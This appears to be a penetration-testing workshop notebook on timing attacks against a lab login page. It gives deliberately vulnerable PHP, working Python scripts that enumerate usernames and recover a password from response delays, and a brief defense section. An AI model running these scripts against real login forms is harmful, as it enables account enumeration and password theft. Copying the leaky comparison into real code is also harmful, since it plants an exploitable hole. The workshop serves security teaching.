# WORKSHOP 1: Web Penetration Testing 1
## Part four: general timing attack
In this last part, we'll depart from injections to look at a different kind of timing attack. This time, we won't be injecting anything. Instead, we'll rely entirely on server side delays to extract information. Although the specific attack we'll be doing is somewhat artificial, this is very common vulnerability which doesn't receive as much attention as I think it deserves.

Here's the webpage:

In [2]:
from IPython.display import IFrame, HTML

# I'm declaring URL as a global variable because the workshop
# is located on a local IP which is subject to change.
# Make sure you run this code first to declare the variable.
URL = 'http://172.16.4.60/ws1/login-admin.php'

IFrame(URL, width='100%', height=400)

### Analysis
Stop for a bit and think about how the notice might related to part three. It takes a small amount of time to check each character of the password. Every time we get another character right, the delay increases a bit.

Here's the PHP. This should just confirm what you now already know:
```PHP
if (\$_POST["username"] == "<username>") {
    \$charcount = strlen(\$password1);
    \$failed = False;
    for (\$i=0; \$i<\$charcount; \$i++) {
        usleep(<delay>);
        if (\$password1[\$i] != \$_POST["password"][\$i]) {
            \$failed = True;
            break;
        }
    }
    if (\$failed == True) {
        echo "<h2>Login failed</h2>";
    }
    else {
        usleep(<delay>);
        echo "<h2>Admin Panel</h2>\nWelcome, <username>. The flag is xxxxxxxxx.<br><br>\n";
    }
}

```
(Note: the \$ are due to issues with Jupyter code markdown and MathJax. The actual code has no backslashes)

You may notice that I'm censoring the username. Username enumeration is one of the most common variants of the timing attack. OpenSSH suffered from a vulnerability in which attackers could use server response time to determine what users existed on the system until August 2016. It may not sound like much, but if you're trying to brute force into a machine knowing what accounts exist to be brute-forced into is a great place to start.

### Attack
To save you some time, I'm providing a list of common usernames. I got this list form https://github.com/danielmiessler/SecLists, which has a great collection of pen testing wordlists.

The first thing we'll do is try every username with a blank password and see what the response times look like.

In [14]:
import requests

unames = ["root", "admin", "test", "guest", "info", "adm",
          "mysql", "user", "administrator", "oracle", "ftp",
          "pi", "puppet", "ansible", "ec2-user", "vagrant",
          "azureuser"]

# I'm putting everything in a list so I can sort it.
# This is just to make the output a bit easier to read
response_times = []

for uname in unames:
    post_params = { "username" : uname, "password" : ""}
    request = requests.post(URL, data=post_params)
    response_times.append((uname, request.elapsed.total_seconds()))

for item in sorted(response_times, key=lambda x: x[1]):
    print(item)

('mysql', 0.005111)
('test', 0.005236)
('user', 0.005648)
('info', 0.005675)
('adm', 0.005691)
('guest', 0.005894)
('admin', 0.005949)
('azureuser', 0.00661)
('puppet', 0.006807)
('ec2-user', 0.006904)
('ansible', 0.006952)
('pi', 0.007036)
('oracle', 0.007049)
('vagrant', 0.019405)
('ftp', 0.02158)
('root', 0.02195)
('administrator', 0.056705)


Notice how much the longest response time, for administrator, distinguishes itself? It took over 50ms to respond, whereas the nearest competitor, root, took only 4ms to respond.

So, it seems that the username we're looking for is administrator, and the delay I censored out in the PHP above is around 50ms. On LAN, I've been able to get accurate results with a delay as low as 15ms, but for this workshop I'm sacrificing time for the sake of reliability.

Now, we want to get the password for that user. The below code should look very familiar by now.

In [15]:
password_guess = ""
possible_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"

iteration = 2

while True:
    new_character = False
    for char in possible_chars:
        payload = {"username" : "administrator", "password" : password_guess + char}
        
        response = requests.post(URL, data=payload)
        if response.elapsed.total_seconds() > 0.05 * iteration:
            iteration += 1
            
            password_guess = password_guess + char
            print(password_guess)
            new_character = True
    
    if not new_character:
        break

t
tI
tIm
tIm3
tIm3d


Remember that timing attacks involve a bit of randomness, and random network delays can break the loop. If the password stops popping out halfway through, just run the code again.

While you're waiting for the password to be cracked, look over the stuff I've changed. There's a new variable titled "iteration", which starts at 2. This is beacuse the first delay is caused by getting the username right. After that, the code looks very similar to what we had in part three. The payload has been substantially simplified because we are not longer doing any injections, but the only other change is the iteration multiplier to the response time check. Every time we get a character right, the delay increases by a further 50ms. The iteration variable increases over time to account for this, keeping our delay where it needs to be.

There's another user on this system if you want to work through this attack again. You'll need to use a more complete wordlist, which can be found on the seclists page provided above.

### Defense
Unfortunately, defending against timing attacks isn't nearly as easy as defending against SQL injection. Any kind of processing your system does will introduce some amount of delay, and if an attacker can measure that delay they can weaponize it. With an accurate enough timer, these kinds of attacks can even be used to break cryptosystems.

Additionally, adding random delays isn't enough to completely stop a timing attack even if network delay exceeds processing delay. With enough data, a clever attacker can use statistical analysis to determine which usernames on average have smaller response times.

Timing attacks for username enumeration can be dealt with by either ensuring the the time difference between login checks for users that exist and users that don't is either negligable or random.